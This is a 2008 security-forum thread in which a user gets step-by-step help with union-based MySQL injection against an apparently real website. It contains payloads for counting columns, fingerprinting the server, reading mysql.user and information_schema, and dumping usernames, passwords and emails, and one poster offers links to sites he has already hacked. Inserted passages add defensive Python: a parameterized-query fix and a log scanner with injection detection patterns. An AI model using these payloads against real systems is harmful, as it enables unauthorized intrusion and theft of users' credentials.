Waraxe IT Security Portal
MySQL injection problem
Posted: Sat Feb 09, 2008 12:32 pm
Panic_Mode

First of all I'm glad to join your community guys.

Now, I have an injection problem. I have found the number of columns (5 btw) and the table name (let's call it table_name), and now I am trying to get the union all select command to work.

I am trying "union all select 0,0,0,0,0 from table_name" but I get a "The used SELECT statements have a different number of columns" error.

Any clues?

Re: MySQL injection problem
Posted: Sat Feb 09, 2008 1:04 pm
gtal3x

Well for me it seems that u didn't find the right number of columns, btw use:
union+select+1,2,3,4,5/*

Posted: Sat Feb 09, 2008 1:21 pm
waraxe

There can be more complicated situations, where sql injection occurs in multiple sql queries with different number of columns.
In this case blind sql injection methods can be useful - instead of UNION you can use SubSelects functionality and BENCHMARK, if needed.

By the way - you can see error messages, right? Is there info about error location - script name and line number?

Posted: Sat Feb 09, 2008 1:23 pm
Panic_Mode

Yeh the message was pretty obvious

So I did the "order by [n]" again and started getting error on 23. But wtf 22 column table?

Anyway, now when I try the union select I get "Unknown column 'e.OK' in 'order clause'" error

Tnx for help

Posted: Sat Feb 09, 2008 1:36 pm
waraxe

Panic_Mode wrote:
Yeh the message was pretty obvious

So I did the "order by [n]" again and started getting error on 23. But wtf 22 column table?

Anyway, now when I try the union select I get "Unknown column 'e.OK' in 'order clause'" error

Tnx for help


Yes, it is not rare to see such big numbers. I have seen > 60 columns - it was SELECT * with multiple JOINs ...

Next, comment out the end of the clause, as gtal3x already suggested before.

Something like:
Code:

UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22+FROM+table_name/*


If you see error messages, post them here.

Posted: Sat Feb 09, 2008 1:39 pm
Panic_Mode

waraxe wrote:
By the way - you can see error messages, right? Is there info about error location - script name and line number?


Not detailed errors. I get errors like the ones I posted: "Unknown column 'e.OK' in 'order clause'", "The used SELECT statements have a different number of columns" etc... It's mysql + php combo, so there is not much info in errors... :p

Posted: Sat Feb 09, 2008 1:43 pm
waraxe

Panic_Mode wrote:
waraxe wrote:
By the way - you can see error messages, right? Is there info about error location - script name and line number?


Not detailed errors. I get errors like the ones I posted: "Unknown column 'e.OK' in 'order clause'", "The used SELECT statements have a different number of columns" etc... It's mysql + php combo, so there is not much info in errors... :p


It's because there is checking code for mysql result handle and if it's FALSE, then mysql_error() will be executed.
If programmers are lazy (in most cases), then no checking and next mysql call with invalid handle will emit php warning level error message, like "Warning: ... mysql_fetch_row ... error ... line 112 ..."
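
For defenders, the point of the post above is that either kind of message in the response tells the client how the query is built. The following is an added example, not part of the original thread: it uses Python's sqlite3 as a stand-in for the PHP/MySQL application, and the table, function names and messages are constructed for illustration.

```python
import logging
import re
import sqlite3

log = logging.getLogger("app.db")

def make_db():
    """Constructed in-memory table standing in for the application's data."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT, body TEXT)")
    db.execute("INSERT INTO articles VALUES (1, 'hello', 'first post')")
    return db

def show_article_leaky(db, raw_id):
    """Input concatenated into the statement, driver error echoed to the page."""
    sql = "SELECT title, body FROM articles WHERE id = " + raw_id + " ORDER BY title"
    try:
        row = db.execute(sql).fetchone()
    except sqlite3.Error as exc:
        return "Database error: %s" % exc   # response now describes the query's shape
    return row[0] if row else "Not found"

def show_article_hardened(db, raw_id):
    """Validated input, bound parameter, fixed message; detail stays in the server log."""
    if not re.fullmatch(r"[0-9]{1,9}", raw_id):   # id is numeric by contract
        return "Not found"
    try:
        row = db.execute("SELECT title, body FROM articles WHERE id = ? ORDER BY title",
                         (int(raw_id),)).fetchone()
    except sqlite3.Error:
        log.exception("article lookup failed")    # full traceback, server side only
        return "Internal error"
    return row[0] if row else "Not found"
```

The bound parameter is what closes the injection; the fixed error message only removes the feedback channel and is not a substitute for it.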

Posted: Sat Feb 09, 2008 1:54 pm
Panic_Mode

I commented out the end and it seemed to work (thanks gtal3x and waraxe).

Now I get each column's number in the page, in the place where data from that column should be presented... but no other output.

Any help to move on?

Posted: Sat Feb 09, 2008 2:18 pm
waraxe

Panic_Mode wrote:
I commented out the end and it seemed to work (thanks gtal3x and waraxe).

Now I get each column's number in the page, in the place where data from that column should be presented... but no other output.

Any help to move on?


Now you must find column or columns capable of outputting long enough data. Let's assume, that you see feedback from column 15:

Code:

UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,@@version,16,17,18,19,20,21,22/*


Code:

UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,USER(),16,17,18,19,20,21,22/*


Code:

UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,DATABASE(),16,17,18,19,20,21,22/*


Code:

UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,name,16,17,18,19,20,21,22+FROM+mysql.user/*


And if you want info from table_name, then you must know column names!

Code:

UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,put_known_column_name_here,16,17,18,19,20,21,22+FROM+table_name/*

Posted: Sat Feb 09, 2008 2:54 pm
Panic_Mode

Thanks for your help mate.

The normal functions can be executed and give an output to these fields. But now I tried outputting info from a column of the table_name. The first guess was (of course) "password". It seemed to output some random password number (the first in the row maybe?).

Now my guess (and plz correct me if I am wrong) is that I need a "where" attribute to output a specific password or whatever I want...
e.g.
Code:
UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,password,16,17,18,19,20,21,22+FROM+table_name/*+WHERE+name+=doe

but the main problem is that I don't seem to guess the other columns correctly to determine a specific user...

Posted: Sat Feb 09, 2008 3:12 pm
waraxe

So you have sql injection, where only single row can be fetched?
Then you must use LIMIT x,y.
Next, find out all important column names - username, fname, lname, email, login, password, salt, hash, phone, etc etc ...
You can use INFORMATION_SCHEMA, if mysql is 5.x version.

And finally:

Code:

UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,CONCAT(username,0x5e,password,0x5e,email),16,17,18,19,20,21,22+FROM+table_name+LIMIT+0,1/*


This will give you first row. Next row can be fetched via manipulating LIMIT clause.

Posted: Sat Feb 09, 2008 4:44 pm
Panic_Mode

Everything works like a charm. But I want to work with the INFORMATION_SCHEMA thing a bit. :p

I use
Code:
UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,COLUMN_NAME+FROM+information_schema.columns+AND+TABLE_NAME=[here the table name]+WHERE+TABLE_SCHEMA=[here the db name]+LIMIT+0,1/*


and I get the error
Code:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'AND TABLE_NAME=XXXX WHERE TABLE_SCHEMA=XXXXX LIMIT 1,2/* ORDER BY e.OK DES' at line 1


mysql 5.0.22 version

Posted: Sat Feb 09, 2008 5:14 pm
gtal3x

just do this:
Code:
+union+select+1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,column_name,7,8,9,0,1,2+from+information_schema.columns+where+column_name+like+0x257573657225+limit+1,1/*


btw r u tryin to hack skai.gr? I have got many sites already hacked, so if u wonna get train, send me pm i will give u links

Posted: Sat Feb 09, 2008 5:21 pm
waraxe

You have syntax errors in clause ...

Try this:

Code:

UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,COLUMN_NAME+FROM+information_schema.columns+WHERE+TABLE_NAME=[here the table name]+AND+TABLE_SCHEMA=[here the db name]+LIMIT+0,1/*

Posted: Sat Feb 09, 2008 5:39 pm
Panic_Mode

First of all tnx guys for your help and quick replies once more

@gtal3x
Tried your code but I only get the output "User". With LIMIT I try to fetch some other names but no luck. Only user comes out. Also User column doesn't exist in the table...

(also what does "0x257573657225" stand for?)

@waraxe
I get the error
Code:
Unknown column '[here the table name]' in 'where clause'

column?
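
Seen from the server side, the requests exchanged in this thread leave recognisable shapes in the web access log. The following detection sketch is an added example, not part of the original thread: the rule names, the `/list.php` endpoint and the log lines are constructed, and the client addresses come from documentation ranges.

```python
import re
from urllib.parse import unquote_plus

# Rule names are this example's own; each pattern matches a request shape quoted in the thread.
RULES = {
    "order-by-probe": re.compile(r"\border\s+by\s+\d+", re.I),
    "union-select": re.compile(r"\bunion\s+(all\s+)?select\b", re.I),
    "numeric-filler": re.compile(r"\bselect\s+(\d+\s*,\s*){3,}", re.I),
    "schema-enum": re.compile(r"\b(information_schema|mysql\.user)\b", re.I),
    "fingerprint": re.compile(r"@@version|\b(user|database)\s*\(\s*\)", re.I),
    "comment-truncation": re.compile(r"(/\*|--\s|#)\s*$"),
}
HEX_LITERAL = re.compile(r"\b0x((?:[0-9a-f]{2})+)\b", re.I)
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+"')

def classify(query):
    """Return (sorted rule names, decoded hex literals) for one raw query string."""
    text = unquote_plus(query)
    hits = sorted(name for name, rx in RULES.items() if rx.search(text))
    decoded = [bytes.fromhex(h).decode("latin-1") for h in HEX_LITERAL.findall(text)]
    return hits, decoded

def scan(lines):
    """Return (client, rule names, decoded literals) for every line that matches a rule."""
    findings = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m or "?" not in m.group(2):
            continue
        hits, decoded = classify(m.group(2).split("?", 1)[1])
        if hits:
            findings.append((m.group(1), hits, decoded))
    return findings

# Constructed access-log lines (documentation IP ranges, hypothetical /list.php endpoint).
SAMPLE_LOG = [
    '198.51.100.4 - - [09/Feb/2008:12:30:01 +0000] "GET /list.php?id=7 HTTP/1.1" 200 5120',
    '203.0.113.9 - - [09/Feb/2008:13:23:10 +0000] "GET /list.php?id=7+order+by+23 HTTP/1.1" 200 310',
    '203.0.113.9 - - [09/Feb/2008:14:18:44 +0000] "GET /list.php?id=7+UNION+ALL+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,@@version,16,17,18,19,20,21,22/* HTTP/1.1" 200 5230',
    '203.0.113.9 - - [09/Feb/2008:17:14:02 +0000] "GET /list.php?id=7+union+select+1,2,3,column_name,5+from+information_schema.columns+where+column_name+like+0x257573657225+limit+1,1/* HTTP/1.1" 200 5198',
]

if __name__ == "__main__":
    for client, hits, decoded in scan(SAMPLE_LOG):
        print(client, hits, decoded)
```

A single rule such as `order-by-probe` can fire on legitimate traffic, so alerting works better on several rules matching from the same client within a short window.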